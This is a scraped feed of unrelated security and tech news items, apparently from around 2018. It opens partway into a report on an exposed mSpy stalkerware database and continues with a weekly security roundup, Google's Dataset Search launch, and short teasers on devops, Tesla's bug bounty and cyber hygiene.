A list of data points that can be slurped from a mobile device that is secretly running mSpy’s software.

Shah later added that when he attempted to alert mSpy to his findings, the company’s support personnel ignored him.

 “I was chatting with their live support, until they blocked me when I asked them to get me in contact with their CTO or head of security,” Shah said.

KrebsOnSecurity then alerted mSpy to the exposed database on Aug. 30. The company responded with an email from mSpy’s chief security officer, who gave only his first name, “Andrew.”

“We have been working hard to secure our system from any possible leaks, attacks, and private information disclosure. All our customers’ accounts are securely encrypted and the data is being wiped out once in a short period of time. Thanks to you we have prevented this possible breach and from what we could discover the data you are talking about could be some amount of customers’ emails and possibly some other data. However, we could only find that there were only a few points of access and activity with the data.” Andrew wrote.

This is not the first time mSpy has been held responsible for a leak of the sensitive records of millions of its customers. In May 2015, KrebsOnSecurity broke the news that mSpy had been hacked and its customer data had been posted on the Dark Web.

This Week in Security News: Tracking and Hacking

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.  This week, Google revealed a secret deal with Mastercard that allows it to track what users buy offline. Also, Senate and House representatives warn that regulation may be coming for social media companies.

Read on:

Little Security Input in IoT Deployment Decisions

Trend Micro’s survey of global IT and security decision-makers found that companies are exposing themselves to greater risks by excluding IT security teams from discussions on IoT deployment plans.

BEC is Big Business for Hackers: What makes these attacks so hard to prevent?

Business Email Compromise, or BEC, is creating opportunities for cybercriminals to make money off of their malicious activity, and the sophistication of these attacks make them difficult to guard against.

Hacking, Cyberattacks Now the Biggest Threat to U.S., Trump’s Homeland Security Chief Warns

Homeland Security Secretary Kirstjen Nielsen stated that cyberweapons pose a greater threat to the U.S. than the risk of physical attacks.

Securing the Convergence of IT with OT

IT/OT processes may converge as they evolve. DevOps breaks down the barriers between development and operations for rapid deployment of new functions without compromising software quality.

Google Secretly Tracks What You Buy Offline Using Mastercard Data

After admitting that it tracks users’ location even after they disable location history, Google revealed that it has signed a secret deal with Mastercard that allows it to track what users buy offline.

The Risk of IoT Security Complacency

Most senior executives recognize that IoT can introduce security risk to the organization, but few will invest resources to remediate that risk.

After Equifax’s Mega-Breach, Nothing Changed

The Equifax data breach that affected more than 145.5 million U.S. adults was supposed to change everything about cybersecurity regulation on Capitol Hill. One year later, it hasn’t changed anything.

Outsmarting Email Hackers Using AI and Machine Learning

Cybercriminals compromise email accounts to enter the IT premises of an organization and carry out attacks ranging from fraud and spying to information and identity theft.

Facebook, Twitter Face Threat of Regulation as Congress Criticizes Response to Russia, Bias Claims

Senate and House representatives applauded efforts by Facebook and Twitter to root out foreign election meddling, but warned that regulation may loom for social media companies.

Do you think companies need to include security teams in discussions about IoT deployment plans? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Google launches ‘Dataset Search’ to help scientists and journalists

Google Dataset Search: This new search engine helps scientists hunt for public data

Google on Wednesday launched a new search engine targeted at the scientists, data journalists, data geeks or anyone else looking for precise datasets online.

The service called Dataset Search is a targeted search that can help scientists and data journalists find the data required for their work and their stories, or simply to satisfy their intellectual curiosity.

The new search engine works similar to Google Scholar, the company’s popular search engine for academic studies and reports. Dataset Search enables users to find datasets stored across thousands of repositories on the Web, making these datasets universally accessible and useful.

“Dataset Search lets you find datasets wherever they’re hosted, whether it’s a publisher’s site, a digital library, or an author’s personal web page,” Natasha Noy, Research Scientist, Google AI, said in a blog post.

ALSO READ: Google launches new job search feature

To create Dataset Search, Google developed guidelines for dataset providers to describe their data in a way that the company (and other search engines) can better understand the content of their pages.

The approach is based on an open-source standard laid out by the collaborative data community Schema.org.

“These guidelines include salient information about datasets: who created the dataset, when it was published, how the data was collected, what the terms are for using the data, etc. We then collect and link this information, analyze where different versions of the same dataset might be, and find publications that may be describing or discussing the dataset,” Noy said.

“We encourage dataset providers, large and small, to adopt this common standard so that all datasets are part of this robust ecosystem,” added Noy.

Dataset Search contains contents from organizations like NOAA and NASA, as well as from academic repositories such as Harvard’s Dataverse and Inter-university Consortium for Political and Social Research (ICPSR), along with government data and data provided by news organizations, such as ProPublica.

Dataset Search works in multiple languages with support for additional languages expected to come soon. You can find more information on Google’s official blog post here.


Source: Google

The post Google launches ‘Dataset Search’ to help scientists and journalists appeared first on TechWorm.

IDG Contributor Network: Visibility is key for devops and the hybrid cloud

Cloud has undoubtedly become a key component of successful business in recent years, especially when you consider the race to digitally transform. Across the globe, companies are moving their applications and services to the cloud and are consequently reaping the benefits of lower capex and opex as a result.

However, with this process, cloud migration is only a beginning for any organization’s digital transformation (DX) journey. If harnessed correctly, cloud is a pillar of innovation for DX, and can be a driving force for new business models and use cases that – even a few years ago – weren’t possible. No one knows this better than devops teams; these teams hold the line when it comes to continuous delivery and deployment, and it therefore stands to reason that devops play a crucial role in the digital transformation journey. In practice however, the decision makers in charge of cloud strategies are rarely those in the bowels of the ship.

To read this article in full, please click here

Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program

Electric vehicle manufacturer Tesla is encouraging what it calls “good faith” security research in its bug bounty program. In its vulnerability disclosure program, Tesla says it welcomes “the community to participate in our responsible reporting process” for the company’s product offerings and services. Researchers who participate in the program must report a vulnerability along with […]… Read More

The post Tesla Encouraging “Good Faith” Security Research in Bug Bounty Program appeared first on The State of Security.

6 ways companies fail at security fundamentals

Back to basics

While advanced cyber attacks grab the attention in headlines, often companies are undone by failing to adhere to the basics of cyber security best practices. Tripwire recently released its State of Cyber Hygiene report, which looks at how well organizations are deploying the basic security controls the Center for Internet Security (CIS) refers to as “cyber hygiene.” These include monitoring, benchmarking, patching, configuring and remediating.

To read this article in full, please click here